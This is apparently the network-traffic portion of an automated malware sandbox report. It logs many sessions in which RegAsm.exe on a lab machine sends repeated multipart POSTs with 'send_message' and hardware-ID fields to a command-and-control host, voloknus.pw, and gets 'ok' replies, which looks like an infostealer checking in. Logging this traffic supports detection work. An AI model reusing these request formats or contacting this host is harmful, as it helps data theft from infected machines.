Nov 7, 2023 15:21:11.496978998 CET	20	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:11.973062038 CET	22	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=8ljgn2ad089hp9570etve7lvaq; expires=Sat, 02 Mar 2024 08:07:50 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3uZ4E%2Bl2TD%2B%2FGA6gUeAEzKhE1GAOFmJ3vZycTHh6%2ByNaJvympTJmdmTYLM%2Fx%2BHuQaaLG8qtM2YuZqj62ZEEKyz38e1Ry3ga7fOYgRG%2FZpAczyWXPO4zQR28rKceLog%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638a36927c5b4-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:11.973095894 CET	22	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.8	49738	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:44.390173912 CET	182	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:44.390861034 CET	183	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:44.862003088 CET	184	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=uc912t7hdj79ngf5u1q7qa9qgf; expires=Sat, 02 Mar 2024 08:08:23 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:44 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y%2FtZiAI7qk6ewUMbuGiwjfeSM7JRmXtVTVTSjTIrcHtV0u0wfebT9meF0g9wfm0yi1JC3JDOcaRkPTp0FYpWs8MDts1JVpibLoeaAbsIi7VZgjwfHkHEvWX2Cckxug%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822639710e500927-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:44.862024069 CET	184	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.8	49739	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:45.062963009 CET	185	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:45.065258026 CET	185	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:45.502103090 CET	187	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=epi3hq7kbi7tgt0lurrl4buf4s; expires=Sat, 02 Mar 2024 08:08:24 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:45 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=09Kotjt0Muu1DEgqgkZ9W9oarnVhaPO5VTJustlKnWWji81kSgsML%2BjGF5l6QvCV6OC2xggZSKqjrDhf8wSPGaPwnPhKWxzdJqi0XTS6yJXG4dh1pW6LbeYmLWQt9Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822639753d7dc741-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:45.502141953 CET	187	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.8	49740	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:45.698699951 CET	187	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:45.699407101 CET	188	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:46.199678898 CET	189	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=qgokra68g6g7ivnlmhao495nf3; expires=Sat, 02 Mar 2024 08:08:25 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:46 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K7hNUjncPMf4Nqhrduhjgrs69tvwSFffMNkAU3bS0i8w%2BRPJ0sXRNtd4w8LEwAd6Fui%2FtS7%2FSh%2BQKem5RUr244g%2FapVcZGEAcH1ZIqueUhA3t0xBa2wDSj9cgQXPYQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822639792cfdc4d9-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:46.199706078 CET	189	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.8	49741	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:46.367185116 CET	190	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:46.368789911 CET	190	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:46.801822901 CET	192	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=o77n3el3lq49fvavou45fl5ceq; expires=Sat, 02 Mar 2024 08:08:25 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:46 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=J3NzyEQZNCX2ZZzkvDTOhLChYXYVXFo7V9f40hCPK4Lc6MGf%2F%2B14tMBEg0PWuoW3zrdbLJqrhnVckcR0ynOR8vC6xVlW9tl8SffgQsx0%2BYDKRNQ%2F43tfEYoGzxqslA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8226397d5b31eb47-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:46.801847935 CET	192	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.8	49742	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:46.999975920 CET	193	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:47.000890017 CET	193	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:47.487495899 CET	195	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=ra5nmi8n1v2avv38tg2vatfn42; expires=Sat, 02 Mar 2024 08:08:26 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:47 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lBqjYxu7KEzSyOmh0eMI3VwskY46smmzHmMfeasxaTmNu%2BLQR%2FFdqLulGshlTD9jZos4P8IUjwJ0P3pk89O4qbJQzSsUWgZnoYi7aWUyqz6ed17i7GU4HZUDQeDsjw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822639815df9c3e9-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:47.487510920 CET	195	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.8	49743	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:47.662266970 CET	195	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:47.664716959 CET	196	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:48.145910025 CET	197	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=2cqjn4mb85crbl1sqk6l5t20l7; expires=Sat, 02 Mar 2024 08:08:26 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:48 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U72v6FXA36Z97MdVAvBVEuYeykyvjDU1vHFPXqE6j2sR9Cp0MYg1pdbelVbpVa6Q%2FWzQJP2bGhB6FKlmGfEDPZsj4mcDWBVm4X7m%2Fc2YHBzV1KcVtQWU%2BrNxBfgzEA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822639857c090895-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:48.145932913 CET	197	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.8	49744	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:48.308851004 CET	198	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:48.309473038 CET	198	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:48.785731077 CET	200	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=f0dkqrh71dl9frjma88p3h6jfl; expires=Sat, 02 Mar 2024 08:08:27 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:48 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eoN58yOcdUZtauhyJ7Wwc6mDMn%2FNvEM8VozcwkksOx0SM1PhZ%2F7G9dpY%2FR%2BamGo0w5aWHxVYAAMU%2F3KwHoqOlfiJ2OqaHoL82Iwbij2MxJiwomn6fm6VTCZIskZLRA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822639897cd4ec23-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:48.785818100 CET	200	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.8	49745	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:48.961400032 CET	200	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 1276 Host: voloknus.pw
Nov 7, 2023 15:21:48.962121010 CET	202	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:49.401158094 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=ov1iorvsqg2kflr1hg88m5d1u7; expires=Sat, 02 Mar 2024 08:08:28 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:49 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0GZ%2BrOvF1Ej9Is8ZQsq51wy%2BzVFcxnUwSDEP%2B0maso3gLhQDbFLFTAnz8EXOhaEpyqYPRNzZU3GhfBZp993ADxqUYDKdkS8a5nVf68tYSYL7Vsq7h6H7hqSZnOtwvQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8226398d9d2fc606-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:49.401192904 CET	203	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.8	49710	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:12.137855053 CET	22	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:12.138509035 CET	23	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:12.628182888 CET	24	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=aerkljr01n66b0qt1nust81n6m; expires=Sat, 02 Mar 2024 08:07:51 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q%2FO%2BNHTWBpE%2Bq6HN3Ih%2BBtm%2BwIfmN3fs4ZHjvCPSnox6%2F4s0g6cYeGO85E%2Bw4o7JcXkwgGDxbB0yJA3lfp4ZpvnHSGfFbEumhr5o3ugmEdh%2FlBCHDVF6XrMyzi3DTA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638a76ec9c36e-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:12.628220081 CET	24	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.8	49711	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:12.793735981 CET	25	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:12.794464111 CET	25	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
